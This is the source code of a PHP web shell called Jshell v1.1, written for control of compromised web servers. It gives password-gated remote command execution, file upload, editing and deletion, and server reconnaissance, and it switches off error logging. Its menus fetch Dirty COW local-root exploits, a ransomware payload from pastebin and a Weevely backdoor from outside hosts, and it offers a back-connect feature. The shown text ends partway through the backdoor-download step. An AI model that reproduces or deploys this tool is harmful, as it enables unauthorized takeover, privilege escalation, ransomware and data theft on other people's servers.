Jshell v1.1

1. <?php
2. /**
3. * [ Jshell v1.1 - 2018. ]
4. *
5. * @author shutdown57 ( alinko ) < alinkokomansuby@gmail.com >
6. * @version 1.0 2018
7. * @link page  : https://facebook.com/fp.javcode
8. * @link group : https://facebook.com/groups/jc.javcode
9. * @see https://github.com/alintamvanz ( alintamvanz )
10. * @see https://pastebin.com/u/shutdown57 ( shutdown57 )
11. * @copyright &copy; 2018 JavCode.
12. *
13. **/
14. $config = [
15.         'title' => 'Jshell v1.1', // set title name.
16.     'debug' => true, // if debug true is any error showed.
17.         'icon' => 'http://alintamvanz.github.io/jshell/javcode-grey.png',
18.     'src_jquery' => 'http://alintamvanz.github.io/jshell/jquery.min.js',
19.     'src_datatables' => 'http://alintamvanz.github.io/jshell/jquery.dataTables.js',
20.     'src_style' => 'http://alintamvanz.github.io/jshell/style-js.css',
21. ];
22.  
23. Class Jshell{
24.     public $menubar;
25.   public $src_link;
26.   public $password;
27.  public function __construct()
28.  {
29.     /** The script started here. **/
30. $this->password = 'w'; // password
31.  
32. if($config['debug'] === true)
33.   { error_reporting(-1); }else{ error_reporting(0); }
34. error_log(0);
35. session_start();
36. ob_start();
37. set_time_limit(0);
38. @ini_set('error_log',NULL);
39. @ini_set('log_errors',0);
40. @ini_set('max_execution_time',0);
41. @ini_set('output_buffering',0);
42. @ini_set('display_errors', 0);
43.  
44. // login authetication
45. if(empty($_SESSION['jshell']))
46. {
47.   echo "<center><h3>Jshellv1 - 2018</h3><form method=post><input type=password name=passw placeholder=password><input type=submit value=Go></form></center>";
48.   if(isset($_POST['passw']))
49.   {
50.     if($_POST['passw'] == $this->password)
51.     {
52.       $_SESSION['jshell'] = true;
53.       echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";
54.     }
55.   }
56.   exit;
57. }
58.  
59.   $GLOBALS['getfullpath'] = (empty($_GET['jshell_path'])) ? getcwd() : $_GET['jshell_path'];
60.   @chdir($GLOBALS['getfullpath']);
61.   $baselink = "?jshell_path=".$GLOBALS['getfullpath']."&jshell_act=";
62.     $this->menubar = [
63.     'Home' => $_SERVER['PHP_SELF'],
64.     'Upload' => $baselink.'upl',
65.   'Command' => $baselink.'cmd',
66.   'Localroot' => $baselink.'lc',
67.   'Back Connect' => $baselink.'net',
68.   'PHP' => $baselink.'php',
69.   'Weevely' => $baselink.'wev',
70.   'Ransomware' => $baselink.'rans',];
71.  
72.   $this->src_link = [
73.     'adminer' => '',
74.     'weevely' => 'https://raw.githubusercontent.com/alintamvanz/alintamvanz.github.io/master/jshell/Jweevely.php',
75.     'mailer' => '',
76.     'lc' => [
77.       'dirty' => 'https://github.com/alintamvanz/localroot/raw/master/dirtycow-mem',
78.       'c0w' => 'https://github.com/alintamvanz/localroot/raw/master/c0w',
79.       'cowroot' => 'https://github.com/alintamvanz/localroot/raw/master/cowroot',
80.     ],
81.     'ransomware' => 'https://pastebin.com/raw/JfzDnXK3',
82.   ];
83.  
84.  
85. }
86.  public function Jcmd($cmd) {
87. if(function_exists('system')) {    
88.     @ob_start();    
89.     @system($cmd);    
90.     $exect = @ob_get_contents();    
91.     @ob_end_clean();    
92.     return $exect;  
93.   } elseif(function_exists('exec')) {    
94.     @exec($cmd,$results);    
95.     $exect = "";    
96.     foreach($results as $result) {      
97.       $exect .= $result;    
98.     } return $exect;  
99.   } elseif(function_exists('passthru')) {    
100.     @ob_start();    
101.     @passthru($cmd);    
102.     $exect = @ob_get_contents();    
103.     @ob_end_clean();    
104.     return $exect;  
105.   } elseif(function_exists('shell_exec')) {    
106.     $exect = @shell_exec($cmd);    
107.     return $exect;  
108.   }
109. }
110. public function Jgetgrowif()
111. {
112.   if(!function_exists('posix_getegid')) {
113.     $user = @get_current_user();
114.     $uid = @getmyuid();
115.     $gid = @getmygid();
116.     $group = "?";
117.   } else {
118.     $uid = @posix_getpwuid(posix_geteuid());
119.     $gid = @posix_getgrgid(posix_getegid());
120.     $user = $uid['name'];$uid = $uid['uid'];
121.     $group = $gid['name'];$gid = $gid['gid'];
122.   }
123.   $r = ['user' => $user,'uid' => $uid,'group' => $group,'gid' => $gid];
124.   return $r;
125. }
126.  public function Jserverinfo()
127.  {
128.   $mysql = (function_exists('mysql_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
129.   $mysqli = (function_exists('mysqli_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
130.   $wget = ($this->Jcmd('wget --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
131.   $curl = (function_exists('curl_init')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
132.   $perl = ($this->Jcmd('perl --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
133.   $python = ($this->Jcmd('python --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
134.   $bash = ($this->Jcmd('bash --version')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
135.   $gcc = ($this->Jcmd('gcc --help')) ? "<font color=lime>YES</font>" :"<font color=red>NO</font>";
136.   $sm = (ini_get('safe_mode') == 'on') ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
137.   $df = (ini_get('disable_functions')) ? wordwrap(ini_get('disable_functions'),100,"\n",true) : "<font color=red>NO !</font>";
138.   $sysfo = [
139.     'hostname' => $_SERVER['HTTP_HOST'],
140.     'system' => php_uname(),
141.     'phpv' => phpversion(),
142.     'software' => $_SERVER['SERVER_SOFTWARE'],
143.     'ipserver' => gethostbyname($_SERVER['HTTP_HOST']),
144.     'ipclient' => $_SERVER['REMOTE_ADDR'],
145.     'mysql' => $mysql,
146.     'mysqli' => $mysqli,
147.     'wget' => $wget,
148.     'curl' => $curl,
149.     'perl' => $perl,
150.     'python' => $python,
151.     'bash' => $bash,
152.     'gcc' => $gcc,
153.     'safemode' => $sm,
154.     'disafunc' => $df];
155.     return $sysfo;
156.  }
157.  public function Jcurdir($path,$goto){
158.   $dir = str_replace("\\","/",$path);
159.   $dir = explode("/",$dir);
160.   foreach($dir as $o=>$i){
161.     if($i == "" && $o == 0){
162.       echo "<a href=\"javascript:menuklik('?".$goto."=/')\">/</a>";continue;}
163.       if($i == "")continue;
164.       echo "<a href=\"javascript:menuklik('?".$goto."=";
165.       for($p=0;$p<=$o;$p++){
166.         echo $dir[$p]; if($p != $o){
167.           echo "/";} } echo "')\">".$i."</a>/";}
168.           if(is_writable($path)){echo "- [<b><font color=lime>W</font></b>]";}elseif(is_readable($path)){echo "- [<b><font color=red>R</font></b>]";}else{echo "- [<b><font color=grey>Unknown</font></b>]<meta http-equiv='refresh' content='4;url=?'>";}}
169.  public function Jcaller($url,$name)
170.  {
171. $fp = fopen($name,"w");
172. $co = file_get_contents($url);
173. return fwrite($fp,$co);
174. fclose($fp);
175.  }
176.  public function Jheader($config = array())
177.  {
178.     ?>
179.     <!DOCTYPE html>
180.     <html>
181.     <head>
182.         <title><?=$config['title'];?> [<?=$_SERVER['HTTP_HOST'];?>]</title>
183.         <meta charset="utf-8">
184.         <meta name="author" content="shutdown57">
185.         <link rel="icon" type="text/css" href="<?=$config['icon'];?>">
186.         <script type="text/javascript" src="<?=$config['src_jquery'];?>"></script>
187.         <script type="text/javascript" src="<?=$config['src_datatables'];?>"></script>
188.         <!-- <link rel="stylesheet" type="text/css" href="valid/assets/css/w3.css"> -->
189.     <link rel="stylesheet" type="text/css" href="<?=$config['src_style'];?>">
190.         <script type="text/javascript">
191.             function select_all(pilih)
192.             {
193.                 var cek = document.getElementsByName('pilih[]');
194.                 for (var i =0; n=cek.length;i++) {
195.                     cek[i].checked = pilih.checked;
196.                 }
197.             }
198.         function logout()
199.         {
200.           $.ajax({
201.             url:'?jshell_act=logout',
202.             success:function(e)
203.             {
204.               alert('Bye Boyz!');
205.               window.location.href='';
206.             }
207.           });
208.         }
209.         function menuklik(uri)
210.         {
211.           $('.right').html("<img src='https://dfw.ink/images/loading_gif.gif' style='width:50px;height:50px;'>");
212.           history.pushState(null,null,uri);
213.           $.ajax({
214.             url:uri,
215.             success:function(e)
216.             {
217.               $('body').html(e);
218.             },error:function(e)
219.             {
220.               alert('Something wrong :D '+e);
221.             }
222.           });
223.         }
224.         function rename(dir,file)
225.         {
226.           var newname = prompt('New name');
227.           if(newname != null){
228.             window.location.href='?jshell_path='+dir+'&jshell_file='+file+'&n='+newname+'&jshell_act=ren';
229.           }else{
230.             alert('Nama file masih kosong');
231.           }
232.         }
233.         function hs(l,p)
234.         {
235.           document.getElementById(l).style.display='none';
236.           document.getElementById(p).style.display='block';
237.         }
238.         function gotodir(dir)
239.         {
240.           var dire = $(dir).val();
241.           $.ajax({
242.             url:'?jshell_path='+dire,
243.             success:function(e)
244.             {
245.               $('body').html(e);
246.               history.pushState(null,null,'?jshell_path='+dire);
247.             },error:function(e)
248.             {
249.               alert('error '+e);
250.             }
251.           });
252.         }
253.             $(document).ready(function()
254.             {
255.         $('body').hide().fadeIn(500);
256.                 $('#filemanager').DataTable({
257.                     'bSort':false,
258.                 });
259.             });
260.         </script>
261.     </head>
262.     <body onload="faded(this)">
263.         <div class="w3-container">
264.  
265.         <header>
266.       <div class="right"></div>
267.             <table class="table" style="width: 98%;margin: 0 auto;border-left: 1px dashed #eee;border-right: 1px dashed #f00;border-top: 1px dashed #f00;border-bottom: 1px dashed #eee;">
268.                 <tr><td style="width: 200px;" class="kiri"><center><img src="https://s19.postimg.cc/jcxygcm1v/javcode-grey.png" style="max-width: 170px;max-height:170px;" ><p><?=$config['title'];?> | by : JavCode.</p></center></td><td>
269. <pre>
270. System : <?=$this->Jserverinfo()['system'];?> [Exploit-DB] [Search Localroot]
271. Hostname : <?=$this->Jserverinfo()['hostname'];?> | Safe Mode : <?=$this->Jserverinfo()['safemode'];?> .
272. Server Software : <?=$this->Jserverinfo()['software'];?>.
273. PHP Version : <?=$this->Jserverinfo()['phpv'];?> - [<a href="javascript:menuklik('?jshell_path=<?=$GLOBALS[getfullpath]?>&jshell_act=phpinfo');">phpinfo</a>] [<a href="javascript:menuklik('?jshell_path=<?=dirname(php_ini_loaded_file());?>&jshell_file=<?=basename(php_ini_loaded_file());?>&jshell_act=view');">php.ini</a>]
274. IP Server : <?=$this->Jserverinfo()['ipserver'];?> | IP Client : <?=$this->Jserverinfo()['ipclient'];?>.
275. HDD : 31.89 / 180.16 GB | [ Free : 148.27 GB ]
276. User : <?=$this->Jgetgrowif()['user'];?> [<?=$this->Jgetgrowif()['uid'];?>] || Group : <?=$this->Jgetgrowif()['group'];?> [<?=$this->Jgetgrowif()['gid'];?>]
277. MySQL : <?=$this->Jserverinfo()['mysql'];?> | MySQLi : <?=$this->Jserverinfo()['mysqli'];?> | Wget : <?=$this->Jserverinfo()['wget'];?> | CURL : <?=$this->Jserverinfo()['curl'];?> | Perl : <?=$this->Jserverinfo()['perl'];?> | Python : <?=$this->Jserverinfo()['python'];?> | Bash : <?=$this->Jserverinfo()['bash'];?> | GCC ( compiler ) : <?=$this->Jserverinfo()['gcc'];?>.
278. Disable functions : <?=$this->Jserverinfo()['disafunc'];?>
279.           </pre>
280.         </td>
281.       </tr>
282.     </table>
283.     <div style="margin-left:10px;margin: 4px;">
284.     <div id="cd">
285.         <a href="javascript:hs('cd','dc');">Current dir</a> ::  <?= $this->Jcurdir($GLOBALS['getfullpath'],'jshell_path');?>
286.     </div>
287.     <div id="dc" style="display: none;">
288.         <label>Go to dir :: </label>
289.         <input type="text" id="gtd" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="button" value=">>" onclick="gotodir('#gtd')" class="submit_m">
290.     </div>
291.   </div>
292.       <ul align=center>
293.  <?php
294.  foreach($this->menubar as $menu=>$link){
295.   echo '<li>[<a href="#" onclick="menuklik(\''.$link.'\');" >'.$menu.'</a>]</li>';
296.     }
297.     ?>
298.   [<a href="#" onclick="logout()"><font color=red>Logout</font></a>]
299.   </ul>
300.         </header><br/><br/>
301.         <h1></h1>
302.     <?php
303.  }
304.  public function Jsdir($dir)
305.  {
306.      // Check if scandir() exist in server.
307.     if(function_exists('scandir'))
308.     {
309.         $s = scandir($dir);
310.     }
311.     return $s;
312.  }
313.  public function Jgetfsize($files) // function for get file size.
314.  {
315.     $size = filesize($files)/1024;
316.     $size = round($size,3);
317.     if($size > 1024){
318.         $size = round($size/1024,2). 'MB';
319.     } else {
320.         $size = $size. 'KB';}
321.         return $size;
322.  }
323.  public function Jgetmime($files) // function for get mime content type
324.  {
325.     if(function_exists('mime_content_type'))
326.     {
327.         if(is_readable($files)){
328.         $mime =mime_content_type($files);
329.         }else{
330.         $mime = "Unknown";
331.         }
332.     }else{
333.         if(is_file($files))
334.         {
335.             $mime = "Files";
336.         }elseif (is_dir($files)) {
337.             $mime = "Directory";
338.         }else{
339.             $mime = "Unknown";
340.         }
341.     }
342.     return $mime;
343.  }
344.  public function Jvf($f){
345.   $file = wordwrap(file_get_contents($f),150,"\n",true);
346.   $a= highlight_string($file,true);
347.   $old = array("0000BB","000000","FF8000","DD0000", "007700");
348.   $new = array("F73D80","e1e1e1", "05f6fa", "F9FF00" , "1dff1b");
349.   $a= str_ireplace($old,$new, $a);
350.   $result = "<div class=\"code\">";$result .= $a;$result.="</div>";
351.   return $result;}
352.  public function Jdel($dir){
353.   if(is_dir($dir)){
354.     if(!rmdir($dir)){
355.       $s=scandir($dir);
356.       foreach ($s as $ss) {
357.         if(is_file($dir."/".$ss)){
358.           if(unlink($dir."/".$ss)){
359.             $rm=rmdir($dir);
360.           }
361.         }
362.         if(is_dir($dir."/".$ss)){
363.           $rm=rmdir($dir."/".$ss);
364.           $rm.=rmdir($dir);
365.         }
366.       }
367.   }elseif(is_file($dir)){
368.     $rm = unlink($dir);
369.   }
370. }elseif(is_file($dir))
371. {
372.   $rm = unlink($dir);
373. }
374. return $rm;
375. }
376.  public function Jupl($a,$b){
377.   if(function_exists('move_uploaded_file')){
378.     $upl = move_uploaded_file($a,$b);
379.   }elseif (function_exists('copy')) {
380.     $upl = copy($a,$b);
381.   }
382.     return $upl;
383.   }
384.   public function array_upload($file){
385.     $file_ary = array();
386.     $file_count = count($file['name']);
387.      $file_key = array_keys($file);
388.      for($i=0;$i<$file_count;$i++) {
389.       foreach($file_key as $val) {
390.         $file_ary[$i][$val] = $file[$val][$i];
391.       }
392.     }
393.     return $file_ary;
394.   }
395.  public function Jgetdmod($files) // function for get date modified.
396.  {
397.     $a_fdm=@date("d-m-Y H:i:s", filemtime($files));
398.     return $a_fdm;
399.  }
400.  public function Jgetowner($path){
401.     if(function_exists('posix_getpwuid')) {
402.         $downer = @posix_getpwuid(fileowner($path));
403.         $downer = $downer['name'];
404.     } else {
405.         $downer = fileowner($path);
406.     }
407.     return $downer;
408.  }
409.  public function Jgetgroup($path){
410.     if(function_exists('posix_getgrgid')) {
411.         $dgrp = @posix_getgrgid(filegroup($path));
412.         $dgrp = $dgrp['name'];
413.     } else {
414.         $dgrp = filegroup($path);
415.     }
416.     return $dgrp;}
417.   public function Jwrite($fname,$content)
418.   {
419.     $fp = fopen($fname,'w');
420.     fwrite($fp,$content);
421.     fclose($fp);
422.   }
423.  public function Jgetperms($file){
424.     $perms = fileperms($file);
425.     if (($perms & 0xC000) == 0xC000) {
426.         $info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info;}
427.  
428.     public function Jgetact($dir,$file)
429.     {
430.         $act_files = [
431.             'delete' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=del',
432.             'edit' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=edit',
433.       'download' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=dl',
434.                 ];
435.         $act_dirs = [
436.             'delete' => '?jshell_path='.$dir.'&jshell_act=del',
437.             ];
438.         $a ='| ';
439.         if(is_file($dir.'/'.$file))
440.         {
441.             foreach($act_files as $val=>$link)
442.             {
443.         $getap = explode("jshell_act=",$link);
444.         $getap= $getap[1];
445.         $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
446.                 $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
447.             }
448.       $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename file : '.$file.'">rename</a> | ';
449.         }elseif(is_dir($dir.'/'.$file))
450.         {
451.             foreach($act_dirs as $val=>$link)
452.             {$getap = explode("jshell_act=",$link);
453.         $getap= $getap[1];
454.         $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
455.                 $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
456.             }
457.       $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename dir : '.$file.'">rename</a> | ';
458.         }
459.         return $a;
460.     }
461.   public function Jtitle($text)
462.   {
463.     echo "<center><h3 class=\"titleac\">..:: ".$text." ::..</h3></center><br/>";
464.   }
465.  public function Jfileman($path)
466.  {
467.     ?>
468.   <form method="post">
469.     <table class="a_exp" id="filemanager" style="margin-top: 0px">
470.         <thead>
471.             <tr><th><input type="checkbox" name="pilih[]" onclick="select_all(this)"></th>
472.                 <th>Files</th>
473.                 <th>Size</th>
474.                 <th>Type</th>
475.                 <th>Date Modif</th>
476.                 <th>Owner:Group</th>
477.                 <th>Permission</th>
478.                 <th>Action</th>
479.             </tr>
480.         </thead>
481.         <tbody>
482.             <tr><td></td><td><a href="#" onclick="menuklik('?jshell_path=<?=dirname($GLOBALS['getfullpath']);?>')"><< Parent directory</a></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
483.             <?php
484.             /* Scan directory in server */
485.             $sdirs = $this->Jsdir($path);
486.             foreach($sdirs as $sd)
487.             {if(is_file($path.'/'.$sd)||$sd == '.'||$sd == '..')continue;
488.                 ?><tr>
489.                     <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sd;?>"></td>
490.                     <td><a href="#" onclick="menuklik('?jshell_path=<?=$path.'/'.$sd;?>')"><?=$sd;?></a></td>
491.                     <td><?=$this->Jgetfsize($path.'/'.$sd);?></td>
492.                     <td><?=$this->Jgetmime($path.'/'.$sd);?></td>
493.                     <td><?=$this->Jgetdmod($path.'/'.$sd);?></td>
494.                     <td><?=$this->Jgetowner($path.'/'.$sd);?>:<?=$this->Jgetgroup($path.'/'.$sd);?></td>
495.                     <td><?=$this->Jgetperms($path.'/'.$sd);?></td>
496.                     <td><?=$this->Jgetact($path,$sd);?></td>
497.  
498.                 </tr>
499.                 <?php
500.             }
501.             /* scan files in server */
502.             $sfile = $this->Jsdir($path);
503.             foreach($sfile as $sf)
504.             {if(is_dir($path.'/'.$sf)||$sf == '.'||$sf == '..')continue;
505.                 ?><tr>
506.                     <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sf;?>"></td>
507.                     <td><a href="#" onclick="menuklik('?jshell_path=<?=$path;?>&jshell_file=<?=$sf;?>&jshell_act=view')"><?=$sf;?></a></td>
508.                     <td><?=$this->Jgetfsize($path.'/'.$sf);?></td>
509.                     <td><?=$this->Jgetmime($path.'/'.$sf);?></td>
510.                     <td><?=$this->Jgetdmod($path.'/'.$sf);?></td>
511.                     <td><?=$this->Jgetowner($path.'/'.$sf);?>:<?=$this->Jgetgroup($path.'/'.$sf);?></td>
512.                     <td><?=$this->Jgetperms($path.'/'.$sf);?></td>
513.                     <td><?=$this->Jgetact($path,$sf);?></td>
514.  
515.                 </tr>
516.                 <?php
517.             }
518.             ?>
519.         </tbody>
520.     </table><div style="clear: both; margin-bottom:69px"></div><table style="bottom: 0;left: 0;position: fixed;"><tr><td>
521.         Actions</td><td><select name="actionx" class="input_m">
522.           <option>----[ action ]----</option>
523.           <option value="delete">Delete</option>
524.           <?php
525.           if(empty($_SESSION['cfile'])){
526.             ?>
527.           <option value="copy">Copy</option>
528.           <?php
529.             }else{
530.               ?><option value="paste">Paste</option><?php
531.             }
532.             ?>
533.         </select><input type="submit" name="sac" value=">>" class="submit_m">
534.   </td></tr></table>
535. </form>
536.     <?php
537.   if(isset($_POST['sac']))
538.   {
539.     if($_POST['actionx'] == 'delete')
540.     {
541.       foreach($_POST['pilih'] as $dfil)
542.       {
543.         if($this->Jdel($dfil))
544.            echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
545.          else
546.            echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
547.       }
548.     }elseif($_POST['actionx'] == 'copy')
549.     {
550.       $_SESSION['cfile'] = $_POST['pilih'];
551.       echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
552.     }elseif($_POST['actionx'] == 'paste')
553.     {
554.       foreach($_SESSION['cfile'] as $paste)
555.       {
556.         copy($paste,$GLOBALS['getfullpath'].'/'.basename($paste));
557.       }
558.       unset($_SESSION['cfile']);
559.     echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
560.     }
561.   }
562.  }
563.  
564.  public function Jshell_act($type,$text = null)
565.  {
566.   if($type == 'cmd')
567.   {
568.     ?>
569.     <form method="post">
570.     <label>jshellv1.1 ~ $</label>
571.     <input type="text" name="cmd" class="input_m" style="width: 500px;"><input type="submit" name="exec" value=">>" class="submit_m">
572.     </form>
573.     <?php
574.   }elseif($type == 'upl')
575.   {
576.     ?>
577.     <center>
578.     <form method="post" enctype="multipart/form-data">
579.       <label>Select file ::</label>
580.       <input type="file" name="jfilez[]" class="input_m" multiple="">
581.       <label>Upload to ::</label>
582.       <input type="text" name="jdirz" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="submit" name="upload" value="Upload !" class="submit_m">
583.     </form>
584.   </center>
585.     <?php
586.   }elseif ($type == 'edit') {
587.     ?>
588.     <center>
589.       <form method="post">
590.         <textarea class="txtarea_m" name="editfile"><?=$text;?></textarea>
591.         <br/>
592.         <input type="submit" name="save" value="Save" class="submit_m" style="padding: 10px;width: 200px;cursor: pointer;">
593.       </form>
594.     </center>
595.     <?php
596.   }elseif($type == 'lc')
597.   {
598.     ?>
599.     <center>
600.       <form method="get" action="https://google.com/search" target="_blank">
601.         <label for="q">Search on google</label>
602.         <input type="text" name="q" placeholder="Search exploit" class="input_m">
603.         <input type="submit" value=">>" class="submit_m">
604.       </form>
605.       <br>
606.       [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=c0w');">c0w</a>]
607.       [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=cowroot');">cowroot</a>]
608.       [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=dirtycow-mem');">dirty-mem</a>]
609.       [<a href="https://exploit-db.com/local/" target="_blank">localroot ex-db</a>]
610.     </center>
611.     <?php
612.   }elseif($type == 'bc')
613.   {
614.     ?><center>
615.       <form method="post">
616.         <label for="ip">IP </label>
617.         <input type="text" name="ip" class="input_m" value="<?=$_SERVER['REMOTE_ADDR'];?>">
618.         <label for="port">Port</label>
619.         <input type="text" name="port" class="input_m" value="5758">
620.         <input type="submit" name="sbmt" value=">>" class="submit_m">
621.       </form>
622.     </center>
623.     <?php
624.   }elseif ($type == 'php') {
625.     ?>
626.     <center>
627.       <form method="post">
628.         <textarea class="txtarea_m" name="code">echo "hello noob";</textarea><br>
629.         <input type="submit" name="sbmt" value="Run !" class="submit_m" style="width: 120px">
630.       </form>
631.     </center>
632.     <?php
633.   }
634.  }
635.  
636. }
637.  
638.  
639. $js = new Jshell;
640.  
641. $js->Jheader($config);
642. if(empty($_GET['jshell_act']))
643. {
644.     $js->Jfileman($GLOBALS['getfullpath']);
645. }else{
646.   //000000000000000000000000000000
647.   $jfilez = @$_GET['jshell_file'];
648.   $jpaptt = @$_GET['jshell_path'];
649.   //000000000000000000000000000000
650.   if($_GET['jshell_act'] == 'del')
651.   {
652.     $delt = (empty($jfilez)) ? $jpaptt : $jpaptt.'/'.$jfilez;
653.     if($js->Jdel($delt)){
654.     echo "<b> Successfully deleted files ~ </b>";
655.     echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
656.     }else{
657.       echo $delt."<br/>";
658.       echo "<b> Failed delete files ~ </b>";
659.     echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
660.    
661.     }
662.   }elseif ($_GET['jshell_act'] == 'ren') {
663.     $fold = $jpaptt.'/'.$jfilez;
664.     $fnew = $jpaptt.'/'.$_GET['n'];
665.     if(@rename($fold,$fnew))
666.     {
667.     echo "<b> Successfully rename files ~ </b>";
668.     echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
669.     }else{
670.     echo "<b> Failed rename files ~ </b>";
671.     echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
672.     }
673.  
674.   }
675. elseif($_GET['jshell_act'] == 'edit')
676. {
677.   $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
678.   $js->Jtitle('Edit file');
679.    echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
680.   $js->Jshell_act('edit',htmlspecialchars(file_get_contents($jpaptt.'/'.$jfilez)));
681.   if(isset($_POST['save']))
682.   {
683.     $fp = $jpaptt.'/'.$jfilez;
684.     $content = $_POST['editfile'];
685.     if($js->Jwrite($fp,$content))
686.     {
687.        echo "<b> Successfully Edit files ~ </b>";
688.     }else{
689.       echo "<b>Failed Edit files ~ </b>";
690.     }
691.   }
692. }
693.   elseif ($_GET['jshell_act'] == 'view') {
694.     $js->Jtitle('View file');
695.     $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
696.     echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
697.    echo $js->Jvf($jpaptt.'/'.$jfilez);
698.   }
699.   elseif($_GET['jshell_act'] == 'logout')
700.   {
701.    session_destroy();
702.   }elseif ($_GET['jshell_act'] == 'cmd') {
703.     $js->Jtitle('Command Shell');
704.     $js->Jshell_act('cmd');
705.     if(isset($_POST['exec'])){
706.       echo "<pre class='code'>";
707.       echo $js->Jcmd($_POST['cmd']);
708.       echo "</pre>";
709.     }
710.   }elseif($_GET['jshell_act'] == 'upl')
711.   {
712.     $js->Jtitle('Uploader');
713.     $js->Jshell_act('upl');
714.     if(isset($_POST['upload'])){
715.       echo "<pre class='code'>";
716.       $file_up = $js->array_upload($_FILES['jfilez']);
717.       foreach($file_up as $filup){
718.         if($js->Jupl($filup['tmp_name'],$_POST['jdirz']."/".$filup['name'])){
719.           $res_upl.="Successfuly Upload file : ".$_POST['jdirz']."/".$filup['name'];
720.         }else{
721.           $res_upl.="Failed to upload file !";}
722.         }
723.         echo $res_upl."<br/></pre>";
724.       }
725.   }elseif ($_GET['jshell_act'] == 'wev') {
726.     $js->Jtitle('Weevely remote shell backdoor');
727.     if($js->Jcaller($js->src_link['weevely'],'Jweevely.php'))
728.     {
729.       echo "<center><b>Successfuly called <a href='Jweevely.php' target='_blank'>Jweevely.php</a> !!</b><br/>";
730.       echo "<p>password :: jshellv1 ,<br/> open your terminal and remote weevely :D </p>";
731.       echo "<pre>$ weevely http://".$_SERVER['HTTP_HOST']."/".dirname($_SERVER['PHP_SELF'])."/Jweevely.php jshellv1 </pre>";
732.     }else{
733.       echo "request failed";
